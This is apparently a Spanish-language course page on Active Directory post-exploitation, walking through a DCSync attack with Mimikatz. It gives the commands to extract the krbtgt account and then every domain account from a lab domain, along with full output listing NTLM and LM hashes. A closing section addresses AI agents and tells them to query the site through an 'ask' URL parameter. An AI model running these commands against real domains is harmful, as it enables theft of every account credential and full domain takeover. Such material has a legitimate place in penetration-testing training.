# Utilizando Mimikatz

Para realizar un DCSync podriamos realizarlo para extraer la informacion de un usuario en especifico o de todos los usuarios:

## <mark style="color:red;">Para un usuario especifico:</mark>

```powershell
PS C:\> .\mimikatz.exe

mimikatz # lsadump::dcsync /domain:spartancybersec.corp /user:krbtgt
[DC] 'spartancybersec.corp' will be the domain
[DC] 'First-DC.spartancybersec.corp' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/19/2022 11:34:18 PM
Object Security ID   : S-1-5-21-1861162130-2580302541-221646211-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: b44daa015f201fa31126895ebbcbbcab
    ntlm- 0: b44daa015f201fa31126895ebbcbbcab
    lm  - 0: 216e51b46d2f3117bfb04f5b1aeef460
```

## <mark style="color:red;">Para exfiltrar todos los usuarios del dominio:</mark>

```powershell
mimikatz # lsadump::dcsync /domain:spartancybersec.corp /all /csv
[DC] 'spartancybersec.corp' will be the domain
[DC] 'First-DC.spartancybersec.corp' will be the DC server
[DC] Exporting domain 'spartancybersec.corp'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1116    Suspicious-PC$  d566c257631be77cde24694488ef337d        4096
502     krbtgt  b44daa015f201fa31126895ebbcbbcab        514
500     Administrator   c90fb8ae170b856da331fa40d5c11769        512
1009    FIRST-DC$       9e24232fd09fa4eb1fdf798597550a40        532480
1008    admin   64fbae31cc352fc26af97cbdef151e03        66048
1126    clearpass.user  64fbae31cc352fc26af97cbdef151e03        66048
1120    compwrite.user  64fbae31cc352fc26af97cbdef151e03        66048
1115    constrained.user        64fbae31cc352fc26af97cbdef151e03        66048
1113    dnsadmin.user   64fbae31cc352fc26af97cbdef151e03        66048
1121    gpowrite.user   64fbae31cc352fc26af97cbdef151e03        66048
1123    groupwrite.user 64fbae31cc352fc26af97cbdef151e03        66048
1122    lapsread.user   64fbae31cc352fc26af97cbdef151e03        66048
1125    readgmsa.user   64fbae31cc352fc26af97cbdef151e03        66048
1112    regular.user    64fbae31cc352fc26af97cbdef151e03        66048
1127    roast.user      64fbae31cc352fc26af97cbdef151e03        66048
1114    unconstrained.user      64fbae31cc352fc26af97cbdef151e03        590336
1118    userall.user    64fbae31cc352fc26af97cbdef151e03        66048
1117    userwrite.user  64fbae31cc352fc26af97cbdef151e03        66048
1124    writedacldc.user        64fbae31cc352fc26af97cbdef151e03        66048
1129    USER-SERVER$    dadef894e564c991a5a5714e0a7efc67        4096
1131    WEBSERVER$      449c5f226aff8a2af42ac07ebaf901cb        4096
1130    adminwebserver  64fbae31cc352fc26af97cbdef151e03        66048
1128    asrep.user      64fbae31cc352fc26af97cbdef151e03        4260352
1119    VIKINGSCYBERSEC$        a9e60b71ecaab835b49ec6a56ca99af5        2080
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://books.spartan-cybersec.com/cpad/persistencia-y-post-explotacion-en-ad/dcsync/utilizando-mimikatz.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.